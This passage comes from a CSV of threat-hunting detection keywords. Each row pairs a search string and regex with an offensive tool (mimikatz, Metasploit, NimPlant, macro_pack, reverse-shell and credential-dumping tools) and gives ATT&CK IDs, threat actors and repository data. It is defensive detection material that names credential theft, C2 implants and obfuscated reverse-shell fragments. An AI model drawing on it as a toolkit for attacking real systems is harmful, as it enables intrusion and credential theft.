There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","62099" "*usr/share/seclists*",".{0,1000}usr\/share\/seclists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62100" "*usr/share/wordlists/rockyou.txt*",".{0,1000}usr\/share\/wordlists\/rockyou\.txt.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","62101" "*usr/src/rusthound rusthound *",".{0,1000}usr\/src\/rusthound\srusthound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","62102" "*util.nimplant*",".{0,1000}util\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","62105" "*util/dot_net_deserialization/*",".{0,1000}util\/dot_net_deserialization\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62106" "*utils/payloads.db*",".{0,1000}utils\/payloads\.db.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","62107" "*Utils\Posh.cs*",".{0,1000}Utils\\Posh\.cs.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","62108" 
"*UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN*",".{0,1000}UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62109" "*'UwBvAGM'; $xd = 'AawBlA'*",".{0,1000}\'UwBvAGM\'\;\s\$xd\s\=\s\'AawBlA\'.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","62114" "*v1k1ngfr.github.io/fuegoshell/*",".{0,1000}v1k1ngfr\.github\.io\/fuegoshell\/.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","62115" "*v1k1ngfr/fuegoshell*",".{0,1000}v1k1ngfr\/fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a 
powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","62116" "*V1V1/DecryptTeamViewer*",".{0,1000}V1V1\/DecryptTeamViewer.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","62117" "*V3n0M-Scanner*",".{0,1000}V3n0M\-Scanner.{0,1000}","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve functionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds.
Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Vulnerability Scanner","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","N/A","10","1503","413","2023-11-14T23:05:16Z","2013-10-21T06:05:17Z","62118" "*v4d1/Dome*",".{0,1000}v4d1\/Dome.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","62119" "*valid_user@contoso.com:Password1*",".{0,1000}valid_user\@contoso\.com\:Password1.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","62121" "*vanhauser-thc/thc-hydra*",".{0,1000}vanhauser\-thc\/thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","62122" "*vault::cred*",".{0,1000}vault\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62123" "*vaultSchema.Add(new Guid(""""4BF4C442-9B8A-41A0-B380-DD4A704DDB28""""*",".{0,1000}vaultSchema\.Add\(new\sGuid\(\""4BF4C442\-9B8A\-41A0\-B380\-DD4A704DDB28\"".{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#content","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","62125" "*VBA Obfuscation Tools combined with an MS office document generator*",".{0,1000}VBA\sObfuscation\sTools\scombined\swith\san\sMS\soffice\sdocument\sgenerator.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office 
document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","62126" "*Vbad/VBad.py*",".{0,1000}Vbad\/VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","62127" "*vba-macro-mac-persistence.vbs*",".{0,1000}vba\-macro\-mac\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","62128" "*VBA-RunPE -*",".{0,1000}VBA\-RunPE\s\-.{0,1000}","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. 
It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","N/A","9","804","179","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z","62129" "*vba-windows-persistence.vbs*",".{0,1000}vba\-windows\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","62130" "*vbLib.ExecuteCMDAsync*",".{0,1000}vbLib\.ExecuteCMDAsync.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62131" "*vbLib.Meterpreter*",".{0,1000}vbLib\.Meterpreter.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62132" "*vbLib.UACBypassExecuteCMDAsync*",".{0,1000}vbLib\.UACBypassExecuteCMDAsync.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62133" "*vbLib.WmiExec*",".{0,1000}vbLib\.WmiExec.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62134" "*vbLib.WscriptExec*",".{0,1000}vbLib\.WscriptExec.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62135" "*vbs_obfuscator.vbs*",".{0,1000}vbs_obfuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62143" "*vbs_ofuscator.vbs*",".{0,1000}vbs_ofuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62144" "*vbs-obfuscator.py*",".{0,1000}vbs\-obfuscator\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","62146" "*VBS-UEFI-Locks-Bypass/Config.xml*",".{0,1000}VBS\-UEFI\-Locks\-Bypass\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","62147" "*VbulletinWidgetTemplateRce.py*",".{0,1000}VbulletinWidgetTemplateRce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","62148" "*vcenter_forge_saml_token*",".{0,1000}vcenter_forge_saml_token.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62149" "*vcenter_secrets_dump.*",".{0,1000}vcenter_secrets_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62150" "*vcenter_secrets_dump.rb*",".{0,1000}vcenter_secrets_dump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62151" "*vcsmap*",".{0,1000}vcsmap.{0,1000}","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","N/A","2","139","23","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z","62152" "*vdi2john.pl*",".{0,1000}vdi2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62153" "*VectorKernel\BlockNewProc*",".{0,1000}VectorKernel\\BlockNewProc.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62154" 
"*VectorKernel\CreateToken*",".{0,1000}VectorKernel\\CreateToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62155" "*VectorKernel\ModHide*",".{0,1000}VectorKernel\\ModHide.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62156" "*VectorKernel\StealToken*",".{0,1000}VectorKernel\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62157" "*VectorKernel-main.zip*",".{0,1000}VectorKernel\-main\.zip.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","62158" "*vectra-ai-research/MAAD-AF*",".{0,1000}vectra\-ai\-research\/MAAD\-AF.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for 
simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","62159" "*veeam_credential_dump.*",".{0,1000}veeam_credential_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62160" "*veeam_dump*",".{0,1000}veeam_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62161" "*veeam_dump_mssql.ps1*",".{0,1000}veeam_dump_mssql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","62162" "*veeam_dump_postgresql.ps1*",".{0,1000}veeam_dump_postgresql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
